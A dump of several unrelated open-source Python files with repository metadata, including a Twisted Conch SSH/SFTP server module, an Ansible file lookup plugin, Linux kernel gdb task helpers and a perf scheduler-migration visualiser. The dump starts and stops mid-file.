cursor = doc.getCurrentController().getViewCursor()
if self.bModify==True:
oCurObj=cursor.TextField
sKey=u""+self.win.getEditText("txtName")
sValue=u"[[ " + self.win.getEditText("txtExpression") + " ]]"
oCurObj.Items = (sKey,sValue)
oCurObj.update()
self.win.endExecute()
else:
oInputList = doc.createInstance("com.sun.star.text.TextField.DropDown")
if self.win.getEditText("txtName")!="" and self.win.getEditText("txtExpression")!="":
sKey=u""+self.win.getEditText("txtName")
sValue=u"[[ " + self.win.getEditText("txtExpression") + " ]]"
if cursor.TextTable==None:
oInputList.Items = (sKey,sValue)
text.insertTextContent(cursor,oInputList,False)
else:
oTable = cursor.TextTable
oCurCell = cursor.Cell
tableText = oTable.getCellByName( oCurCell.CellName )
oInputList.Items = (sKey,sValue)
tableText.insertTextContent(cursor,oInputList,False)
self.win.endExecute()
else:
ErrorDialog("Please fill appropriate data in Name field or in Expression field.")
def btnCancel_clicked(self, oActionEvent):
self.win.endExecute()
if __name__<>"package" and __name__=="__main__":
Expression()
elif __name__=="package":
g_ImplementationHelper.addImplementation( Expression, "org.openoffice.openerp.report.expression", ("com.sun.star.task.Job",),)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
tlodge/dataware.nox
|
src/nox/coreapps/examples/countdown.py
|
10
|
1618
|
# Copyright 2008 (C) Nicira, Inc.
#
# This file is part of NOX.
#
# NOX is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# NOX is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NOX. If not, see <http://www.gnu.org/licenses/>.
# Trivial example using reactor timer method to countdown from three
from nox.lib.core import *
import logging
logger = logging.getLogger('nox.coreapps.examples.countdown')
numbers = ["one","two","three"]
index = 0
class countdown(Component):
def __init__(self, ctxt):
Component.__init__(self, ctxt)
def install(self):
# call every second
self.post_callback(1, lambda : self.count_down())
def getInterface(self):
return str(countdown)
def count_down(self):
global index
# No, this isn't mispelled:. If you're curious, see Farscape
# episode 1.17
logger.debug("%s %s" % (numbers[index], 'mippippi'))
index+=1
if index < len(numbers):
self.post_callback(1, lambda : self.count_down())
def getFactory():
class Factory:
def instance(self, ctxt):
return countdown(ctxt)
return Factory()
|
gpl-3.0
|
okuchaiev/f-lm
|
data_utils_test.py
|
2
|
1148
|
import unittest
from data_utils import Vocabulary, Dataset
class DataUtilsTestCase(unittest.TestCase):
def test_vocabulary(self):
vocab = Vocabulary.from_file("testdata/test_vocab.txt")
self.assertEqual(vocab.num_tokens, 1000)
self.assertEqual(vocab.s_id, 2)
self.assertEqual(vocab.s, "<S>")
self.assertEqual(vocab.unk_id, 38)
self.assertEqual(vocab.unk, "<UNK>")
def test_dataset(self):
vocab = Vocabulary.from_file("testdata/test_vocab.txt")
dataset = Dataset(vocab, "testdata/*")
def generator():
for i in range(1, 10):
yield [0] + list(range(1, i + 1)) + [0]
counts = [0] * 10
for seq in generator():
for v in seq:
counts[v] += 1
counts2 = [0] * 10
for x, y in dataset._iterate(generator(), 2, 4):
for v in x.ravel():
counts2[v] += 1
for i in range(1, 10):
self.assertEqual(counts[i], counts2[i], "Mismatch at i=%d. counts[i]=%s, counts2[i]=%s" % (i,counts[i], counts2[i]))
if __name__ == '__main__':
unittest.main()
|
mit
|
ehashman/oh-mainline
|
vendor/packages/twisted/twisted/conch/unix.py
|
20
|
15784
|
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
from twisted.cred import portal
from twisted.python import components, log
from twisted.internet.error import ProcessExitedAlready
from zope import interface
from ssh import session, forwarding, filetransfer
from ssh.filetransfer import FXF_READ, FXF_WRITE, FXF_APPEND, FXF_CREAT, FXF_TRUNC, FXF_EXCL
from twisted.conch.ls import lsLine
from avatar import ConchUser
from error import ConchError
from interfaces import ISession, ISFTPServer, ISFTPFile
import struct, os, time, socket
import fcntl, tty
import pwd, grp
import pty
import ttymodes
try:
import utmp
except ImportError:
utmp = None
class UnixSSHRealm:
interface.implements(portal.IRealm)
def requestAvatar(self, username, mind, *interfaces):
user = UnixConchUser(username)
return interfaces[0], user, user.logout
class UnixConchUser(ConchUser):
def __init__(self, username):
ConchUser.__init__(self)
self.username = username
self.pwdData = pwd.getpwnam(self.username)
l = [self.pwdData[3]]
for groupname, password, gid, userlist in grp.getgrall():
if username in userlist:
l.append(gid)
self.otherGroups = l
self.listeners = {} # dict mapping (interface, port) -> listener
self.channelLookup.update(
{"session": session.SSHSession,
"direct-tcpip": forwarding.openConnectForwardingClient})
self.subsystemLookup.update(
{"sftp": filetransfer.FileTransferServer})
def getUserGroupId(self):
return self.pwdData[2:4]
def getOtherGroups(self):
return self.otherGroups
def getHomeDir(self):
return self.pwdData[5]
def getShell(self):
return self.pwdData[6]
def global_tcpip_forward(self, data):
hostToBind, portToBind = forwarding.unpackGlobal_tcpip_forward(data)
from twisted.internet import reactor
try: listener = self._runAsUser(
reactor.listenTCP, portToBind,
forwarding.SSHListenForwardingFactory(self.conn,
(hostToBind, portToBind),
forwarding.SSHListenServerForwardingChannel),
interface = hostToBind)
except:
return 0
else:
self.listeners[(hostToBind, portToBind)] = listener
if portToBind == 0:
portToBind = listener.getHost()[2] # the port
return 1, struct.pack('>L', portToBind)
else:
return 1
def global_cancel_tcpip_forward(self, data):
hostToBind, portToBind = forwarding.unpackGlobal_tcpip_forward(data)
listener = self.listeners.get((hostToBind, portToBind), None)
if not listener:
return 0
del self.listeners[(hostToBind, portToBind)]
self._runAsUser(listener.stopListening)
return 1
def logout(self):
# remove all listeners
for listener in self.listeners.itervalues():
self._runAsUser(listener.stopListening)
log.msg('avatar %s logging out (%i)' % (self.username, len(self.listeners)))
def _runAsUser(self, f, *args, **kw):
euid = os.geteuid()
egid = os.getegid()
groups = os.getgroups()
uid, gid = self.getUserGroupId()
os.setegid(0)
os.seteuid(0)
os.setgroups(self.getOtherGroups())
os.setegid(gid)
os.seteuid(uid)
try:
f = iter(f)
except TypeError:
f = [(f, args, kw)]
try:
for i in f:
func = i[0]
args = len(i)>1 and i[1] or ()
kw = len(i)>2 and i[2] or {}
r = func(*args, **kw)
finally:
os.setegid(0)
os.seteuid(0)
os.setgroups(groups)
os.setegid(egid)
os.seteuid(euid)
return r
class SSHSessionForUnixConchUser:
interface.implements(ISession)
def __init__(self, avatar):
self.avatar = avatar
self. environ = {'PATH':'/bin:/usr/bin:/usr/local/bin'}
self.pty = None
self.ptyTuple = 0
def addUTMPEntry(self, loggedIn=1):
if not utmp:
return
ipAddress = self.avatar.conn.transport.transport.getPeer().host
packedIp ,= struct.unpack('L', socket.inet_aton(ipAddress))
ttyName = self.ptyTuple[2][5:]
t = time.time()
t1 = int(t)
t2 = int((t-t1) * 1e6)
entry = utmp.UtmpEntry()
entry.ut_type = loggedIn and utmp.USER_PROCESS or utmp.DEAD_PROCESS
entry.ut_pid = self.pty.pid
entry.ut_line = ttyName
entry.ut_id = ttyName[-4:]
entry.ut_tv = (t1,t2)
if loggedIn:
entry.ut_user = self.avatar.username
entry.ut_host = socket.gethostbyaddr(ipAddress)[0]
entry.ut_addr_v6 = (packedIp, 0, 0, 0)
a = utmp.UtmpRecord(utmp.UTMP_FILE)
a.pututline(entry)
a.endutent()
b = utmp.UtmpRecord(utmp.WTMP_FILE)
b.pututline(entry)
b.endutent()
def getPty(self, term, windowSize, modes):
self.environ['TERM'] = term
self.winSize = windowSize
self.modes = modes
master, slave = pty.openpty()
ttyname = os.ttyname(slave)
self.environ['SSH_TTY'] = ttyname
self.ptyTuple = (master, slave, ttyname)
def openShell(self, proto):
from twisted.internet import reactor
if not self.ptyTuple: # we didn't get a pty-req
log.msg('tried to get shell without pty, failing')
raise ConchError("no pty")
uid, gid = self.avatar.getUserGroupId()
homeDir = self.avatar.getHomeDir()
shell = self.avatar.getShell()
self.environ['USER'] = self.avatar.username
self.environ['HOME'] = homeDir
self.environ['SHELL'] = shell
shellExec = os.path.basename(shell)
peer = self.avatar.conn.transport.transport.getPeer()
host = self.avatar.conn.transport.transport.getHost()
self.environ['SSH_CLIENT'] = '%s %s %s' % (peer.host, peer.port, host.port)
self.getPtyOwnership()
self.pty = reactor.spawnProcess(proto, \
shell, ['-%s' % shellExec], self.environ, homeDir, uid, gid,
usePTY = self.ptyTuple)
self.addUTMPEntry()
fcntl.ioctl(self.pty.fileno(), tty.TIOCSWINSZ,
struct.pack('4H', *self.winSize))
if self.modes:
self.setModes()
self.oldWrite = proto.transport.write
proto.transport.write = self._writeHack
self.avatar.conn.transport.transport.setTcpNoDelay(1)
def execCommand(self, proto, cmd):
from twisted.internet import reactor
uid, gid = self.avatar.getUserGroupId()
homeDir = self.avatar.getHomeDir()
shell = self.avatar.getShell() or '/bin/sh'
command = (shell, '-c', cmd)
peer = self.avatar.conn.transport.transport.getPeer()
host = self.avatar.conn.transport.transport.getHost()
self.environ['SSH_CLIENT'] = '%s %s %s' % (peer.host, peer.port, host.port)
if self.ptyTuple:
self.getPtyOwnership()
self.pty = reactor.spawnProcess(proto, \
shell, command, self.environ, homeDir,
uid, gid, usePTY = self.ptyTuple or 0)
if self.ptyTuple:
self.addUTMPEntry()
if self.modes:
self.setModes()
# else:
# tty.setraw(self.pty.pipes[0].fileno(), tty.TCSANOW)
self.avatar.conn.transport.transport.setTcpNoDelay(1)
def getPtyOwnership(self):
ttyGid = os.stat(self.ptyTuple[2])[5]
uid, gid = self.avatar.getUserGroupId()
euid, egid = os.geteuid(), os.getegid()
os.setegid(0)
os.seteuid(0)
try:
os.chown(self.ptyTuple[2], uid, ttyGid)
finally:
os.setegid(egid)
os.seteuid(euid)
def setModes(self):
pty = self.pty
attr = tty.tcgetattr(pty.fileno())
for mode, modeValue in self.modes:
if not ttymodes.TTYMODES.has_key(mode): continue
ttyMode = ttymodes.TTYMODES[mode]
if len(ttyMode) == 2: # flag
flag, ttyAttr = ttyMode
if not hasattr(tty, ttyAttr): continue
ttyval = getattr(tty, ttyAttr)
if modeValue:
attr[flag] = attr[flag]|ttyval
else:
attr[flag] = attr[flag]&~ttyval
elif ttyMode == 'OSPEED':
attr[tty.OSPEED] = getattr(tty, 'B%s'%modeValue)
elif ttyMode == 'ISPEED':
attr[tty.ISPEED] = getattr(tty, 'B%s'%modeValue)
else:
if not hasattr(tty, ttyMode): continue
ttyval = getattr(tty, ttyMode)
attr[tty.CC][ttyval] = chr(modeValue)
tty.tcsetattr(pty.fileno(), tty.TCSANOW, attr)
def eofReceived(self):
if self.pty:
self.pty.closeStdin()
def closed(self):
if self.ptyTuple and os.path.exists(self.ptyTuple[2]):
ttyGID = os.stat(self.ptyTuple[2])[5]
os.chown(self.ptyTuple[2], 0, ttyGID)
if self.pty:
try:
self.pty.signalProcess('HUP')
except (OSError,ProcessExitedAlready):
pass
self.pty.loseConnection()
self.addUTMPEntry(0)
log.msg('shell closed')
def windowChanged(self, winSize):
self.winSize = winSize
fcntl.ioctl(self.pty.fileno(), tty.TIOCSWINSZ,
struct.pack('4H', *self.winSize))
def _writeHack(self, data):
"""
Hack to send ignore messages when we aren't echoing.
"""
if self.pty is not None:
attr = tty.tcgetattr(self.pty.fileno())[3]
if not attr & tty.ECHO and attr & tty.ICANON: # no echo
self.avatar.conn.transport.sendIgnore('\x00'*(8+len(data)))
self.oldWrite(data)
class SFTPServerForUnixConchUser:
interface.implements(ISFTPServer)
def __init__(self, avatar):
self.avatar = avatar
def _setAttrs(self, path, attrs):
"""
NOTE: this function assumes it runs as the logged-in user:
i.e. under _runAsUser()
"""
if attrs.has_key("uid") and attrs.has_key("gid"):
os.chown(path, attrs["uid"], attrs["gid"])
if attrs.has_key("permissions"):
os.chmod(path, attrs["permissions"])
if attrs.has_key("atime") and attrs.has_key("mtime"):
os.utime(path, (attrs["atime"], attrs["mtime"]))
def _getAttrs(self, s):
return {
"size" : s.st_size,
"uid" : s.st_uid,
"gid" : s.st_gid,
"permissions" : s.st_mode,
"atime" : int(s.st_atime),
"mtime" : int(s.st_mtime)
}
def _absPath(self, path):
home = self.avatar.getHomeDir()
return os.path.abspath(os.path.join(home, path))
def gotVersion(self, otherVersion, extData):
return {}
def openFile(self, filename, flags, attrs):
return UnixSFTPFile(self, self._absPath(filename), flags, attrs)
def removeFile(self, filename):
filename = self._absPath(filename)
return self.avatar._runAsUser(os.remove, filename)
def renameFile(self, oldpath, newpath):
oldpath = self._absPath(oldpath)
newpath = self._absPath(newpath)
return self.avatar._runAsUser(os.rename, oldpath, newpath)
def makeDirectory(self, path, attrs):
path = self._absPath(path)
return self.avatar._runAsUser([(os.mkdir, (path,)),
(self._setAttrs, (path, attrs))])
def removeDirectory(self, path):
path = self._absPath(path)
self.avatar._runAsUser(os.rmdir, path)
def openDirectory(self, path):
return UnixSFTPDirectory(self, self._absPath(path))
def getAttrs(self, path, followLinks):
path = self._absPath(path)
if followLinks:
s = self.avatar._runAsUser(os.stat, path)
else:
s = self.avatar._runAsUser(os.lstat, path)
return self._getAttrs(s)
def setAttrs(self, path, attrs):
path = self._absPath(path)
self.avatar._runAsUser(self._setAttrs, path, attrs)
def readLink(self, path):
path = self._absPath(path)
return self.avatar._runAsUser(os.readlink, path)
def makeLink(self, linkPath, targetPath):
linkPath = self._absPath(linkPath)
targetPath = self._absPath(targetPath)
return self.avatar._runAsUser(os.symlink, targetPath, linkPath)
def realPath(self, path):
return os.path.realpath(self._absPath(path))
def extendedRequest(self, extName, extData):
raise NotImplementedError
class UnixSFTPFile:
interface.implements(ISFTPFile)
def __init__(self, server, filename, flags, attrs):
self.server = server
openFlags = 0
if flags & FXF_READ == FXF_READ and flags & FXF_WRITE == 0:
openFlags = os.O_RDONLY
if flags & FXF_WRITE == FXF_WRITE and flags & FXF_READ == 0:
openFlags = os.O_WRONLY
if flags & FXF_WRITE == FXF_WRITE and flags & FXF_READ == FXF_READ:
openFlags = os.O_RDWR
if flags & FXF_APPEND == FXF_APPEND:
openFlags |= os.O_APPEND
if flags & FXF_CREAT == FXF_CREAT:
openFlags |= os.O_CREAT
if flags & FXF_TRUNC == FXF_TRUNC:
openFlags |= os.O_TRUNC
if flags & FXF_EXCL == FXF_EXCL:
openFlags |= os.O_EXCL
if attrs.has_key("permissions"):
mode = attrs["permissions"]
del attrs["permissions"]
else:
mode = 0777
fd = server.avatar._runAsUser(os.open, filename, openFlags, mode)
if attrs:
server.avatar._runAsUser(server._setAttrs, filename, attrs)
self.fd = fd
def close(self):
return self.server.avatar._runAsUser(os.close, self.fd)
def readChunk(self, offset, length):
return self.server.avatar._runAsUser([ (os.lseek, (self.fd, offset, 0)),
(os.read, (self.fd, length)) ])
def writeChunk(self, offset, data):
return self.server.avatar._runAsUser([(os.lseek, (self.fd, offset, 0)),
(os.write, (self.fd, data))])
def getAttrs(self):
s = self.server.avatar._runAsUser(os.fstat, self.fd)
return self.server._getAttrs(s)
def setAttrs(self, attrs):
raise NotImplementedError
class UnixSFTPDirectory:
def __init__(self, server, directory):
self.server = server
self.files = server.avatar._runAsUser(os.listdir, directory)
self.dir = directory
def __iter__(self):
return self
def next(self):
try:
f = self.files.pop(0)
except IndexError:
raise StopIteration
else:
s = self.server.avatar._runAsUser(os.lstat, os.path.join(self.dir, f))
longname = lsLine(f, s)
attrs = self.server._getAttrs(s)
return (f, longname, attrs)
def close(self):
self.files = []
components.registerAdapter(SFTPServerForUnixConchUser, UnixConchUser, filetransfer.ISFTPServer)
components.registerAdapter(SSHSessionForUnixConchUser, UnixConchUser, session.ISession)
|
agpl-3.0
|
amwelch/a10sdk-python
|
a10sdk/core/delete/delete_health_external.py
|
2
|
1033
|
from a10sdk.common.A10BaseClass import A10BaseClass
class HealthExternal(A10BaseClass):
""" :param file_name: {"description": "Specify the Program Name", "format": "string", "minLength": 1, "optional": true, "maxLength": 31, "type": "string"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
Class Description::
Address the External Script Program.
Class health-external supports CRUD Operations and inherits from `common/A10BaseClass`.
This class is the `"PARENT"` class for this module.`
URL for this object::
`https://<Hostname|Ip address>//axapi/v3/delete/health-external`.
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.required=[]
self.b_key = "health-external"
self.a10_url="/axapi/v3/delete/health-external"
self.DeviceProxy = ""
self.file_name = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
|
apache-2.0
|
redbaron/ansible
|
lib/ansible/runner/lookup_plugins/file.py
|
153
|
2413
|
# (c) 2012, Daniel Hokka Zakrisson <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from ansible import utils, errors
import os
import codecs
class LookupModule(object):
def __init__(self, basedir=None, **kwargs):
self.basedir = basedir
def run(self, terms, inject=None, **kwargs):
terms = utils.listify_lookup_plugin_terms(terms, self.basedir, inject)
ret = []
# this can happen if the variable contains a string, strictly not desired for lookup
# plugins, but users may try it, so make it work.
if not isinstance(terms, list):
terms = [ terms ]
for term in terms:
basedir_path = utils.path_dwim(self.basedir, term)
relative_path = None
playbook_path = None
# Special handling of the file lookup, used primarily when the
# lookup is done from a role. If the file isn't found in the
# basedir of the current file, use dwim_relative to look in the
# role/files/ directory, and finally the playbook directory
# itself (which will be relative to the current working dir)
if '_original_file' in inject:
relative_path = utils.path_dwim_relative(inject['_original_file'], 'files', term, self.basedir, check=False)
if 'playbook_dir' in inject:
playbook_path = os.path.join(inject['playbook_dir'], term)
for path in (basedir_path, relative_path, playbook_path):
if path and os.path.exists(path):
ret.append(codecs.open(path, encoding="utf8").read().rstrip())
break
else:
raise errors.AnsibleError("could not locate file in lookup: %s" % term)
return ret
|
gpl-3.0
|
ccrome/linux-caleb-dev
|
scripts/gdb/linux/tasks.py
|
630
|
2892
|
#
# gdb helper commands and functions for Linux kernel debugging
#
# task & thread tools
#
# Copyright (c) Siemens AG, 2011-2013
#
# Authors:
# Jan Kiszka <[email protected]>
#
# This work is licensed under the terms of the GNU GPL version 2.
#
import gdb
from linux import utils
task_type = utils.CachedType("struct task_struct")
def task_lists():
task_ptr_type = task_type.get_type().pointer()
init_task = gdb.parse_and_eval("init_task").address
t = g = init_task
while True:
while True:
yield t
t = utils.container_of(t['thread_group']['next'],
task_ptr_type, "thread_group")
if t == g:
break
t = g = utils.container_of(g['tasks']['next'],
task_ptr_type, "tasks")
if t == init_task:
return
def get_task_by_pid(pid):
for task in task_lists():
if int(task['pid']) == pid:
return task
return None
class LxTaskByPidFunc(gdb.Function):
"""Find Linux task by PID and return the task_struct variable.
$lx_task_by_pid(PID): Given PID, iterate over all tasks of the target and
return that task_struct variable which PID matches."""
def __init__(self):
super(LxTaskByPidFunc, self).__init__("lx_task_by_pid")
def invoke(self, pid):
task = get_task_by_pid(pid)
if task:
return task.dereference()
else:
raise gdb.GdbError("No task of PID " + str(pid))
LxTaskByPidFunc()
class LxPs(gdb.Command):
"""Dump Linux tasks."""
def __init__(self):
super(LxPs, self).__init__("lx-ps", gdb.COMMAND_DATA)
def invoke(self, arg, from_tty):
for task in task_lists():
gdb.write("{address} {pid} {comm}\n".format(
address=task,
pid=task["pid"],
comm=task["comm"].string()))
LxPs()
thread_info_type = utils.CachedType("struct thread_info")
ia64_task_size = None
def get_thread_info(task):
thread_info_ptr_type = thread_info_type.get_type().pointer()
if utils.is_target_arch("ia64"):
global ia64_task_size
if ia64_task_size is None:
ia64_task_size = gdb.parse_and_eval("sizeof(struct task_struct)")
thread_info_addr = task.address + ia64_task_size
thread_info = thread_info_addr.cast(thread_info_ptr_type)
else:
thread_info = task['stack'].cast(thread_info_ptr_type)
return thread_info.dereference()
class LxThreadInfoFunc (gdb.Function):
"""Calculate Linux thread_info from task variable.
$lx_thread_info(TASK): Given TASK, return the corresponding thread_info
variable."""
def __init__(self):
super(LxThreadInfoFunc, self).__init__("lx_thread_info")
def invoke(self, task):
return get_thread_info(task)
LxThreadInfoFunc()
|
gpl-2.0
|
ChronoMonochrome/android_kernel_ste-3.4
|
tools/perf/scripts/python/sched-migration.py
|
11215
|
11670
|
#!/usr/bin/python
#
# Cpu task migration overview toy
#
# Copyright (C) 2010 Frederic Weisbecker <[email protected]>
#
# perf script event handlers have been generated by perf script -g python
#
# This software is distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
import os
import sys
from collections import defaultdict
from UserList import UserList
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
sys.path.append('scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from SchedGui import *
threads = { 0 : "idle"}
def thread_name(pid):
return "%s:%d" % (threads[pid], pid)
class RunqueueEventUnknown:
@staticmethod
def color():
return None
def __repr__(self):
return "unknown"
class RunqueueEventSleep:
@staticmethod
def color():
return (0, 0, 0xff)
def __init__(self, sleeper):
self.sleeper = sleeper
def __repr__(self):
return "%s gone to sleep" % thread_name(self.sleeper)
class RunqueueEventWakeup:
@staticmethod
def color():
return (0xff, 0xff, 0)
def __init__(self, wakee):
self.wakee = wakee
def __repr__(self):
return "%s woke up" % thread_name(self.wakee)
class RunqueueEventFork:
@staticmethod
def color():
return (0, 0xff, 0)
def __init__(self, child):
self.child = child
def __repr__(self):
return "new forked task %s" % thread_name(self.child)
class RunqueueMigrateIn:
@staticmethod
def color():
return (0, 0xf0, 0xff)
def __init__(self, new):
self.new = new
def __repr__(self):
return "task migrated in %s" % thread_name(self.new)
class RunqueueMigrateOut:
@staticmethod
def color():
return (0xff, 0, 0xff)
def __init__(self, old):
self.old = old
def __repr__(self):
return "task migrated out %s" % thread_name(self.old)
class RunqueueSnapshot:
def __init__(self, tasks = [0], event = RunqueueEventUnknown()):
self.tasks = tuple(tasks)
self.event = event
def sched_switch(self, prev, prev_state, next):
event = RunqueueEventUnknown()
if taskState(prev_state) == "R" and next in self.tasks \
and prev in self.tasks:
return self
if taskState(prev_state) != "R":
event = RunqueueEventSleep(prev)
next_tasks = list(self.tasks[:])
if prev in self.tasks:
if taskState(prev_state) != "R":
next_tasks.remove(prev)
elif taskState(prev_state) == "R":
next_tasks.append(prev)
if next not in next_tasks:
next_tasks.append(next)
return RunqueueSnapshot(next_tasks, event)
def migrate_out(self, old):
if old not in self.tasks:
return self
next_tasks = [task for task in self.tasks if task != old]
return RunqueueSnapshot(next_tasks, RunqueueMigrateOut(old))
def __migrate_in(self, new, event):
if new in self.tasks:
self.event = event
return self
next_tasks = self.tasks[:] + tuple([new])
return RunqueueSnapshot(next_tasks, event)
def migrate_in(self, new):
return self.__migrate_in(new, RunqueueMigrateIn(new))
def wake_up(self, new):
return self.__migrate_in(new, RunqueueEventWakeup(new))
def wake_up_new(self, new):
return self.__migrate_in(new, RunqueueEventFork(new))
def load(self):
""" Provide the number of tasks on the runqueue.
Don't count idle"""
return len(self.tasks) - 1
def __repr__(self):
ret = self.tasks.__repr__()
ret += self.origin_tostring()
return ret
class TimeSlice:
def __init__(self, start, prev):
self.start = start
self.prev = prev
self.end = start
# cpus that triggered the event
self.event_cpus = []
if prev is not None:
self.total_load = prev.total_load
self.rqs = prev.rqs.copy()
else:
self.rqs = defaultdict(RunqueueSnapshot)
self.total_load = 0
def __update_total_load(self, old_rq, new_rq):
diff = new_rq.load() - old_rq.load()
self.total_load += diff
def sched_switch(self, ts_list, prev, prev_state, next, cpu):
old_rq = self.prev.rqs[cpu]
new_rq = old_rq.sched_switch(prev, prev_state, next)
if old_rq is new_rq:
return
self.rqs[cpu] = new_rq
self.__update_total_load(old_rq, new_rq)
ts_list.append(self)
self.event_cpus = [cpu]
def migrate(self, ts_list, new, old_cpu, new_cpu):
if old_cpu == new_cpu:
return
old_rq = self.prev.rqs[old_cpu]
out_rq = old_rq.migrate_out(new)
self.rqs[old_cpu] = out_rq
self.__update_total_load(old_rq, out_rq)
new_rq = self.prev.rqs[new_cpu]
in_rq = new_rq.migrate_in(new)
self.rqs[new_cpu] = in_rq
self.__update_total_load(new_rq, in_rq)
ts_list.append(self)
if old_rq is not out_rq:
self.event_cpus.append(old_cpu)
self.event_cpus.append(new_cpu)
def wake_up(self, ts_list, pid, cpu, fork):
old_rq = self.prev.rqs[cpu]
if fork:
new_rq = old_rq.wake_up_new(pid)
else:
new_rq = old_rq.wake_up(pid)
if new_rq is old_rq:
return
self.rqs[cpu] = new_rq
self.__update_total_load(old_rq, new_rq)
ts_list.append(self)
self.event_cpus = [cpu]
def next(self, t):
self.end = t
return TimeSlice(t, self)
class TimeSliceList(UserList):
def __init__(self, arg = []):
self.data = arg
def get_time_slice(self, ts):
if len(self.data) == 0:
slice = TimeSlice(ts, TimeSlice(-1, None))
else:
slice = self.data[-1].next(ts)
return slice
def find_time_slice(self, ts):
start = 0
end = len(self.data)
found = -1
searching = True
while searching:
if start == end or start == end - 1:
searching = False
i = (end + start) / 2
if self.data[i].start <= ts and self.data[i].end >= ts:
found = i
end = i
continue
if self.data[i].end < ts:
start = i
elif self.data[i].start > ts:
end = i
return found
def set_root_win(self, win):
self.root_win = win
def mouse_down(self, cpu, t):
idx = self.find_time_slice(t)
if idx == -1:
return
ts = self[idx]
rq = ts.rqs[cpu]
raw = "CPU: %d\n" % cpu
raw += "Last event : %s\n" % rq.event.__repr__()
raw += "Timestamp : %d.%06d\n" % (ts.start / (10 ** 9), (ts.start % (10 ** 9)) / 1000)
raw += "Duration : %6d us\n" % ((ts.end - ts.start) / (10 ** 6))
raw += "Load = %d\n" % rq.load()
for t in rq.tasks:
raw += "%s \n" % thread_name(t)
self.root_win.update_summary(raw)
def update_rectangle_cpu(self, slice, cpu):
rq = slice.rqs[cpu]
if slice.total_load != 0:
load_rate = rq.load() / float(slice.total_load)
else:
load_rate = 0
red_power = int(0xff - (0xff * load_rate))
color = (0xff, red_power, red_power)
top_color = None
if cpu in slice.event_cpus:
top_color = rq.event.color()
self.root_win.paint_rectangle_zone(cpu, color, top_color, slice.start, slice.end)
def fill_zone(self, start, end):
i = self.find_time_slice(start)
if i == -1:
return
for i in xrange(i, len(self.data)):
timeslice = self.data[i]
if timeslice.start > end:
return
for cpu in timeslice.rqs:
self.update_rectangle_cpu(timeslice, cpu)
def interval(self):
if len(self.data) == 0:
return (0, 0)
return (self.data[0].start, self.data[-1].end)
def nr_rectangles(self):
last_ts = self.data[-1]
max_cpu = 0
for cpu in last_ts.rqs:
if cpu > max_cpu:
max_cpu = cpu
return max_cpu
class SchedEventProxy:
def __init__(self):
self.current_tsk = defaultdict(lambda : -1)
self.timeslices = TimeSliceList()
def sched_switch(self, headers, prev_comm, prev_pid, prev_prio, prev_state,
next_comm, next_pid, next_prio):
""" Ensure the task we sched out this cpu is really the one
we logged. Otherwise we may have missed traces """
on_cpu_task = self.current_tsk[headers.cpu]
if on_cpu_task != -1 and on_cpu_task != prev_pid:
print "Sched switch event rejected ts: %s cpu: %d prev: %s(%d) next: %s(%d)" % \
(headers.ts_format(), headers.cpu, prev_comm, prev_pid, next_comm, next_pid)
threads[prev_pid] = prev_comm
threads[next_pid] = next_comm
self.current_tsk[headers.cpu] = next_pid
ts = self.timeslices.get_time_slice(headers.ts())
ts.sched_switch(self.timeslices, prev_pid, prev_state, next_pid, headers.cpu)
def migrate(self, headers, pid, prio, orig_cpu, dest_cpu):
ts = self.timeslices.get_time_slice(headers.ts())
ts.migrate(self.timeslices, pid, orig_cpu, dest_cpu)
def wake_up(self, headers, comm, pid, success, target_cpu, fork):
if success == 0:
return
ts = self.timeslices.get_time_slice(headers.ts())
ts.wake_up(self.timeslices, pid, target_cpu, fork)
def trace_begin():
global parser
parser = SchedEventProxy()
def trace_end():
app = wx.App(False)
timeslices = parser.timeslices
frame = RootFrame(timeslices, "Migration")
app.MainLoop()
def sched__sched_stat_runtime(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, runtime, vruntime):
pass
def sched__sched_stat_iowait(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, delay):
pass
def sched__sched_stat_sleep(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, delay):
pass
def sched__sched_stat_wait(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, delay):
pass
def sched__sched_process_fork(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
parent_comm, parent_pid, child_comm, child_pid):
pass
def sched__sched_process_wait(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio):
pass
def sched__sched_process_exit(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio):
pass
def sched__sched_process_free(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio):
pass
def sched__sched_migrate_task(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio, orig_cpu,
dest_cpu):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
parser.migrate(headers, pid, prio, orig_cpu, dest_cpu)
def sched__sched_switch(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
prev_comm, prev_pid, prev_prio, prev_state,
